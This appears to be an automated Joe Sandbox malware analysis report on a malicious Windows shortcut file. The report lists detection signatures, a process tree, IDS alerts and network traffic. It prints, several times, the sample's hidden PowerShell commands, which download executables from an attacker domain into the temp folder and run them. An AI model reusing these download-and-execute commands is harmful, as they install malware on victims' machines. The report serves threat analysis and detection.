Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IFhqcKaIol.lnk

Overview

General Information

Sample name:IFhqcKaIol.lnk
renamed because original name is a hash value
Original sample name:7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9.lnk
Analysis ID:1570131
MD5:5ca10c53b0ae072b40f7f69b58e9d43e
SHA1:268367cfec3f452fbd7f33a4a00bc5cc1950a679
SHA256:7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9
Tags:badlarrysguitars-comlnkuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 7372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • nthelper.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Local\Temp\nthelper.exe" MD5: 1CEB5D0CB063290C1F66FCCFED96A220)
        • powershell.exe (PID: 7820 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf") MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 8020 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 1104 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 3796 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1640,i,16748263348592557741,8757425967150341878,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • powershell.exe (PID: 3400 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe") MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1484, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-06T15:42:04.041665+010020197142Potentially Bad Traffic192.168.2.1149706101.99.75.174443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: IFhqcKaIol.lnkReversingLabs: Detection: 21%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49794 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: Joe Sandbox ViewIP Address: 3.219.243.226 3.219.243.226
Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49706 -> 101.99.75.174:443
Source: global trafficHTTP traffic detected: GET /share/drp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /share/alert.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: 14bb0f07-155a-4922-8830-76ed60af57cax-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /private/nois.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownTCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /share/drp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /share/alert.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: 14bb0f07-155a-4922-8830-76ed60af57cax-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /private/nois.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: badlarrysguitars.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE02A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://badlarrysguitars.com
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 0000000A.00000002.2572831859.00000203F2A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 0000000A.00000003.1444813166.00000203F2920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.1360669295.000002F19007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360669295.000002F1901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1337224669.000002F1819C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE0D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC8B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D7901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1337224669.000002F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000006.00000002.1647494860.000001D7FC960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
